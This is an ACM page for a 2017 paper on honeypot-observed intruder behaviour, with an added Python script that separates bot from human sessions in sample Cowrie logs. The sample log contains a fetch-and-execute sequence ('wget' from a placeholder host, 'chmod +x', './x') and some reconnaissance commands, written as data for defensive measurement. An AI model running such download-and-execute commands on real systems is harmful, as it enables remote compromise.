DOI: 10.1145/3134600.3134614 (research article)

Picky Attackers: Quantifying the Role of System Properties on Intruder Behavior

Published: 04 December 2017

Abstract

Honeypots are an invaluable technology that allows researchers and security practitioners to track the evolution of attackers' break-in techniques and to discover new malicious IP addresses, hosts, and victims. Even though there is a wealth of research in which researchers deploy honeypots for a period of time and report on their findings, there is little work that attempts to understand how the underlying properties of a compromised system affect the actions of attackers. In this paper, we report on a four-month-long study involving 102 medium-interaction honeypots in which we vary a honeypot's location, difficulty of break-in, and population of files, and observe how these differences elicit different behaviors from attackers. Moreover, we purposefully leak the credentials of dedicated, hard-to-brute-force honeypots to hacking forums and paste sites and monitor the actions of the incoming attackers. Among other results, we find that, even though bots perform specific environment-agnostic actions, human attackers are affected by the underlying environment, e.g., executing more commands on honeypots with realistic files and folder structures. Based on our findings, we provide guidance for future honeypot deployments and motivate the need for multiple intrusion-detection systems.
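The abstract's two analysis steps, separating scripted bot sessions from human ones and then comparing how many commands humans ran on differently populated honeypots, can be shown on a small log. The script below is an added example and is not code from the paper or from the Cowrie project: it reads constructed newline-delimited JSON events in the shape Cowrie emits for `cowrie.command.input` (the `honeypot` field that tags the variant is my addition), and the bot heuristics (a command sequence replayed verbatim on more than one variant, or a median inter-command gap under 0.5 s) are my assumptions, not the paper's method.

```python
import json
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample. Two variants: "realistic" has a populated home directory,
# "empty" does not. s1/s2 replay one scripted sequence on both variants with
# 0.2 s gaps; s3/s4 are slow, exploratory sessions. Non-command events are
# included to show that they are filtered out.
SAMPLE_LOG = "\n".join([
    '{"eventid":"cowrie.login.success","session":"s1","honeypot":"realistic","timestamp":"2017-03-01T10:00:00.000000Z","username":"root","password":"admin"}',
    '{"eventid":"cowrie.command.input","session":"s1","honeypot":"realistic","timestamp":"2017-03-01T10:00:00.200000Z","input":"cd /tmp"}',
    '{"eventid":"cowrie.command.input","session":"s1","honeypot":"realistic","timestamp":"2017-03-01T10:00:00.400000Z","input":"wget http://example.invalid/x -O x"}',
    '{"eventid":"cowrie.command.input","session":"s1","honeypot":"realistic","timestamp":"2017-03-01T10:00:00.600000Z","input":"chmod +x x"}',
    '{"eventid":"cowrie.command.input","session":"s1","honeypot":"realistic","timestamp":"2017-03-01T10:00:00.800000Z","input":"./x"}',
    '{"eventid":"cowrie.command.input","session":"s2","honeypot":"empty","timestamp":"2017-03-01T10:05:01.100000Z","input":"cd /tmp"}',
    '{"eventid":"cowrie.command.input","session":"s2","honeypot":"empty","timestamp":"2017-03-01T10:05:01.300000Z","input":"wget http://example.invalid/x -O x"}',
    '{"eventid":"cowrie.command.input","session":"s2","honeypot":"empty","timestamp":"2017-03-01T10:05:01.500000Z","input":"chmod +x x"}',
    '{"eventid":"cowrie.command.input","session":"s2","honeypot":"empty","timestamp":"2017-03-01T10:05:01.700000Z","input":"./x"}',
    '{"eventid":"cowrie.command.input","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:10:00.000000Z","input":"uname -a"}',
    '{"eventid":"cowrie.command.input","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:10:06.500000Z","input":"ls -la /home"}',
    '{"eventid":"cowrie.command.input","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:10:15.000000Z","input":"cat /home/john/notes.txt"}',
    '{"eventid":"cowrie.command.input","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:10:31.000000Z","input":"ps aux"}',
    '{"eventid":"cowrie.command.input","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:10:40.000000Z","input":"w"}',
    '{"eventid":"cowrie.session.closed","session":"s3","honeypot":"realistic","timestamp":"2017-03-01T11:11:02.000000Z"}',
    '{"eventid":"cowrie.command.input","session":"s4","honeypot":"empty","timestamp":"2017-03-01T12:00:00.000000Z","input":"uname -a"}',
    '{"eventid":"cowrie.command.input","session":"s4","honeypot":"empty","timestamp":"2017-03-01T12:00:05.000000Z","input":"ls -la /home"}',
])

# Assumed threshold: a human rarely issues consecutive commands faster than this.
GAP_THRESHOLD_S = 0.5


def parse_commands(log_text):
    """Yield (session, variant, timestamp, command) for command events only."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # logins, disconnects, etc. carry no command
        ts = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
        yield ev["session"], ev["honeypot"], ts, ev["input"].strip()


def group_sessions(log_text):
    """Map session id -> {variant, cmds (time-ordered), gaps in seconds}."""
    rows, variant = defaultdict(list), {}
    for sid, var, ts, cmd in parse_commands(log_text):
        rows[sid].append((ts, cmd))
        variant[sid] = var
    out = {}
    for sid, items in rows.items():
        items.sort()
        times = [t for t, _ in items]
        out[sid] = {
            "variant": variant[sid],
            "cmds": [c for _, c in items],
            "gaps": [(b - a).total_seconds() for a, b in zip(times, times[1:])],
        }
    return out


def classify_sessions(log_text):
    """Label each session 'bot' or 'human' (heuristics assumed, not the paper's):
    1. the identical command sequence ran on more than one honeypot variant
       (environment-agnostic behaviour), or
    2. the median gap between commands is below GAP_THRESHOLD_S (scripted typing).
    """
    sess = group_sessions(log_text)
    variants_per_sequence = defaultdict(set)
    for s in sess.values():
        variants_per_sequence[tuple(s["cmds"])].add(s["variant"])
    for s in sess.values():
        replayed = len(variants_per_sequence[tuple(s["cmds"])]) > 1
        fast = bool(s["gaps"]) and statistics.median(s["gaps"]) < GAP_THRESHOLD_S
        s["label"] = "bot" if (replayed or fast) else "human"
    return sess


def mean_commands_by_variant(sessions, label="human"):
    """Average commands per session, per honeypot variant, for sessions with `label`."""
    counts = defaultdict(list)
    for s in sessions.values():
        if s["label"] == label:
            counts[s["variant"]].append(len(s["cmds"]))
    return {v: statistics.mean(n) for v, n in counts.items()}


if __name__ == "__main__":
    labelled = classify_sessions(SAMPLE_LOG)
    for sid, s in sorted(labelled.items()):
        print(f"{sid} {s['variant']:9s} {s['label']:5s} {len(s['cmds'])} cmds: {' ; '.join(s['cmds'])}")
    print("mean commands per human session:", mean_commands_by_variant(labelled))
```

On the sample, s1 and s2 are labelled bots by both rules and s3/s4 as human, and the human mean is 5 commands on the realistic variant against 2 on the empty one, which is the shape of comparison the abstract reports. The replay rule is deliberately crude: a one-command `uname -a` session seen on two variants would also be flagged, so on real data it needs a minimum sequence length and a larger set of variants before it is trusted.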


Cited By (the ten most recent citing works listed on the page)

  • Observation of Human-Operated Accesses Using Remote Management Device Honeypot. IEICE Transactions on Fundamentals of Electronics, Communications and Computer Sciences E107.A(3):291-305, March 2024. doi:10.1587/transfun.2023CIP0018
  • Examining the Cyclical Nature of Crimes: A Looped Crime Script of Data Theft from Organizational Networks. Computers in Human Behavior Reports, 100548, November 2024. doi:10.1016/j.chbr.2024.100548
  • Stargazer: Long-term and Multiregional Measurement of Timing/Geolocation-based Cloaking. IEEE Access, 2023. doi:10.1109/ACCESS.2023.3280815
  • Flow based containerized honeypot approach for network traffic analysis: An empirical study. Computer Science Review 50, 100600, November 2023. doi:10.1016/j.cosrev.2023.100600
  • Interaction matters: a comprehensive analysis and a dataset of hybrid IoT/OT honeypots. Proceedings of the 38th Annual Computer Security Applications Conference, 742-755, December 2022. doi:10.1145/3564625.3564645
  • Measuring and Clustering Network Attackers using Medium-Interaction Honeypots. 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), 294-306, June 2022. doi:10.1109/EuroSPW55150.2022.00036
  • Analysing Attackers and Intrusions on a High-Interaction Honeypot System. 2022 27th Asia Pacific Conference on Communications (APCC), 433-438, October 2022. doi:10.1109/APCC55198.2022.9943718
  • Autoencoder-based feature construction for IoT attacks clustering. Future Generation Computer Systems 127(C):487-502, April 2022. doi:10.1016/j.future.2021.09.025
  • Continuous and Multiregional Monitoring of Malicious Hosts. Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 2101-2103, October 2020. doi:10.1145/3372297.3420018
  • A Measurement Study of IoT-Based Attacks Using IoT Kill Chain. 2020 IEEE 19th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom), 557-567, December 2020. doi:10.1109/TrustCom50675.2020.00080
Published In

ACSAC '17: Proceedings of the 33rd Annual Computer Security Applications Conference, December 2017, 618 pages. ISBN 9781450353458, DOI 10.1145/3134600.

Publisher

Association for Computing Machinery, New York, NY, United States

Qualifiers

• Research article
• Refereed limited

Conference

ACSAC 2017 (overall acceptance rate: 104 of 497 submissions, 21%)

